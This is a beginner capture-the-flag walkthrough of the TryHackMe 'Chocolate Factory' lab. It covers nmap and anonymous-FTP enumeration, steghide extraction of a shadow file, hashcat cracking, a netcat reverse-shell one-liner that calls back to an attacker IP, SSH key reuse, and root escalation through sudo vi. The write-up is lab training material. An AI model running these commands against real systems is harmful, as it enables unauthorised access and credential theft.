THM — Chocolate Factory (beginner friendly)

Difficulty: Easy

https://tryhackme.com/room/chocolatefactory

Charlie :D
  1. Enumeration:

nmap -A -vv 10.10.104.219

nmap scan

-A :enables OS detection, version detection, script scanning, and traceroute

I find an interesting area to explore in the nmap result:

http://localhost/key_rev_key

With a deciphering message after: You will get the key here.

I browse to port 80 of the machine’s IP.

A download prompt appears and I save the file called key_rev_key and print out the contents with the command cat to get a key.

From the nmap scan result:

ftp-anon: Anonymous FTP login allowed

This means that I can login via FTP to the machine’s IP.

Anonymous ftp allowed (no password required)

2. Exploitation

I identified the next step.

Let’s login:

ftp 10.10.104.219

type anonymous for the name prompt and press enter

I browse (I use the dir command) and find an image. I download it (I use the get command).

Now for the stego part, i analysed it with steghide.

steghide info gum_room.jpg

There is an embedded file “b64.txt”

I extract it by typing:

steghide extract -sf gum_room.jpg

b64 is base64; so i base64 decoded the contents of the b64.txt using CyberChef:

https://gchq.github.io/CyberChef/

/etc/shadow file

The decoded output is the file that saves all the passwords as hashes on a Linux system: /etc/shadow

Therefore attempting to crack the hash of Charlie will get you his password in plaintext.

The first two fields of the /etc/shadow

Username : It is your login name.

Password : It is your encrypted password. The password should be minimum 8–12 characters long including special characters, digits, lower case alphabetic and more. Usually password format is set to $id$salt$hashed, The $id is the algorithm used On GNU/Linux as follows:

$1$ is MD5

$2a$ is Blowfish

$2y$ is Blowfish

$5$ is SHA-256

$6$ is SHA-512

Ref: https://www.cyberciti.biz/faq/understanding-etcshadow-file/

The password cracking tool I used is hashcat.

I extracted the hashed password and removed all colons and the username and saved it in a text file called hash.txt (feel free to change the name to whatever)

Example of an extracted hash, mind you, it is not the one found in THM, so you gotta try on your own! haha

hashcat -m 1800 -a 0 -o found1.txt hash.txt /usr/share/wordlists/rockyou.txt

Login with the credentials found on the webpage login portal.

A remote command execution is found. (not shown here)

On the machine, start your netcat listener.

nc -lvnp 9001

Let’s generate a reverse shell.

I usually use the one below. Do not forget to modify with your machine ip and with the port you are listening on.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.53 9001 >/tmp/f
gain shell

And we gain a shell via netcat.

I don’t like to stabilise shell with python. What if python isn’t installed?

I found a fast alternative.

/usr/bin/script -qc /bin/bash /dev/null

Run the above in the shell.

Ctrl+z

Now enter:

stty raw -echo; fg; reset

Press enter twice.

We are now in the web server, I then navigate and find I don’t have the necessary permission to view the file: user.txt in the home directory of Charlie but i can view the contents.

The file teleport catches my attention.

When I delve inside, I find something that looks like a SSH key.

I proceed to copy this to a text file, e.g. sshkey.txt

chmod 600 sshkey.txt

and amend the permissions to match those of general SSH keys.

ssh charlie@victim_ip -i sshkey.txt

I am now Charlie.

I am able to view the contents of user.txt and read the flag.

cat user.txt

3. Privilege Escalation

Now, I want root access to the machine to get the flag root.txt

I always run sudo -l to check what binary can run with root privileges.

A bit of research and I realise that I can gain a root shell when running vi as sudo.

sudo vi

spawning root shell

I press ESC and enter the below command in vi -

:!/bin/bash

Press Enter.

You are now root.

There is a python file in the root directory that I can’t wait to run.

python root.py

enter the key you found in first

It is asking me for a key so I enter the one I found at the beginning and enjoy the view of the nice ascii message on printing the contents of root.txt ;)

cat root.txt

I hope you enjoyed the read. Have fun with this one.

Sipping water on my island, watching Netflix and hacking while avoiding parties. Special thanks to my boo for encouraging me! ❤